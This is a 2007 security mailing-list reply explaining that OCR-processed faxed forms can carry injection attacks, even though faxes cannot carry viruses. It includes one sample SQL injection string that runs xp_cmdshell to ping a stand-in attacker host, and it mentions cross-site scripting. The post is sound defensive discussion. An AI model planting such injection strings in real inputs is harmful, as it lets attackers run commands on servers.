Home page logo
/

basics logo Security Basics mailing list archives

Re: FUD - was FAX a virus
From: "Robert Wesley McGrew" <wesley () mcgrewsecurity com>
Date: Fri, 2 Mar 2007 15:49:56 -0600

I'm not sure if I'm the one this is directed to or not, but I will
respond.  I understand how a fax works, and I agree that a "faxing a
virus" in the context of the original question is not possible.  To
clear things up, I agree with you on that.

However, I do think there are other avenues of attack one should look
at in a system where incoming faxes are treated as input data, and
that is what my intention was with my previous email.

Once that document has gone through the
analog-scan-to-digitization-thru-transmission-noise-and-back-out-the-other-end
procedure, what you wind up with, as you explained very well, is a
digital representation of what the document "looked" like.  It's all a
bitmapped image at this point and as long as the purpose is for
someone to read over it, human eyes and printers and such, then that's
how it'll likely stay.

That said, there's the temptation at this point to want to convert
this back to machine-parse-able data.  Say, for example, we're
accepting faxed requests for service manuals.  Lots of folks are
sending us faxes of a form that we have them fill out, specifying part
#, name, whether they want it mailed or faxed back, etc.  OCR
software's pretty good, and we've got an especially good situation for
it when we have some expectation of what we're getting is supposed to
look like (form with nicely laid out fields, "please print clearly",
maybe even tick marks to separate characters).  The faxing process
mangles our document a bit, but nothing a well tweaked OCR solution
couldn't deal with.

So, at this point, we could happily process these incoming faxes with
some degree of automation, reading the part numbers, faxing back
manuals or putting orders into a database to be fulfilled.  Let's see
where the next one wants to be shipped to: "hax'; exec xp_cmdshell
'ping+lol.evil.com'"... (or whatever sort of injection you want to
perform.  Maybe someone views the data in a html-rendering environment
and you want to web bug or cross-site-script them.)

I know this is way out of scope of the original question, but I'd hate
for someone else to look at a thread like this and make the leap from
"oh ok a fax virus in this case isn't going to work because it'd get
all munged up" to "attack vectors over fax just won't work because of
this analog-digital-analog-digital voodoo".  I don't think that the
situation I've described is unrealistic or too contrived, and I
certainly don't think that recommending that someone pay attention to
how data coming in like this is processed is FUD.

You are 100% spot-on about a virus somehow working its way through the
transmission, however, and I do think this thread had a serious need
for a easy-to-understand description of how a fax actually works like
you have given

--
Robert Wesley McGrew
http://mcgrewsecurity.com